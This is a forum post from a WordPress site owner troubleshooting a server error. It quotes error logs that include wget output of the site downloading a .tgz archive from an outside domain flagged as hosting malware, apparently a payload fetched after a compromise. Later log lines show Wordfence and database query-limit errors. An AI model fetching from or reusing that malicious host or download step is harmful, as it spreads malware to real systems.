Our website - http://otionsoap.com -- is mysteriously generating an "Internal Server Error" message. After lengthy discussion with the host - they are scratching their heads and we must wait while a trouble ticket is generated and further examination.
Based on what I can see in our error logs, my hunch is a hacker/spammer has messed up our database. Here are some of the errors in the error log - especially note the top one containing http://menotepoer.com -- I went to that URL and it said "warning, this site contains malware"
20150217T061633: www.otionsoap.com/blog/index.php
--2015-02-17 06:16:16-- http://menotepoer.com/wps/wp/arc/b8efa8e2dbff3bc59da94855f776c125.tgz
Resolving menotepoer.com (menotepoer.com)... 195.154.73.79
Connecting to menotepoer.com (menotepoer.com)¦195.154.73.79¦:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9040597 (8.6M) [application/x-gzip]
Saving to:
1.tgz'
0K .......... .......... .......... .......... .......... 0% 305K 29s
50K .......... .......... .......... .......... .......... 1% 607K 22s
100K .......
20150513T172335: www.otionsoap.com/DRAFT/wp-admin/plugins.php
WordPress database error Table 'wrd_i26fdek5hb.wp_wfConfig' doesn't exist for query select val from wp_wfConfig where name='disableConfigCaching' made by activate_plugin, include_once('/plugins/wordfence/wordfence.php'), wordfence::install_actions, wordfence::runInstall, wfConfig::get, wfDB->querySingle
WordPress database error Table 'wrd_i26fdek5hb.wp_wfConfig' doesn't exist for query select val from wp_wfConfig where name='cbl_restOfSiteBlocked' made by activate_plugin, include_once('/plugins/wordfence/wo
20150605T165953: www.otionsoap.com/DRAFT/wp-admin/install.php
WordPress database error User 'wrd94xv3B2H' has exceeded the 'max_questions' resource (current value: 75000) for query SHOW TABLES LIKE 'wp\\_users' made by display_setup_form
20150605T170018: www.otionsoap.com/DRAFT/wp-admin/install.php
WordPress database error User 'wrd94xv3B2H' has exceeded the 'max_questions' resource (current value: 75000) for query SHOW TABLES LIKE 'wp\\_users' made by display_setup_formViewing our database via phpmyadmin, I'm seeing several files that don't look familiar, but since I rarely peek into the phpmyadmin, it's possible they've always been there and I just don't recognize the names. I wanted to attach a screenshot, but not seeing a way to do that. Within the phpmyadmin are files with names like:
wp_wfBadLeechers
wp_wfBlocks
wp_wfLockedOutAre those typical within a WordPress database?
Any hunches on what has happened here while we wait and wait for our host to check on this?
Uggh. What a mess!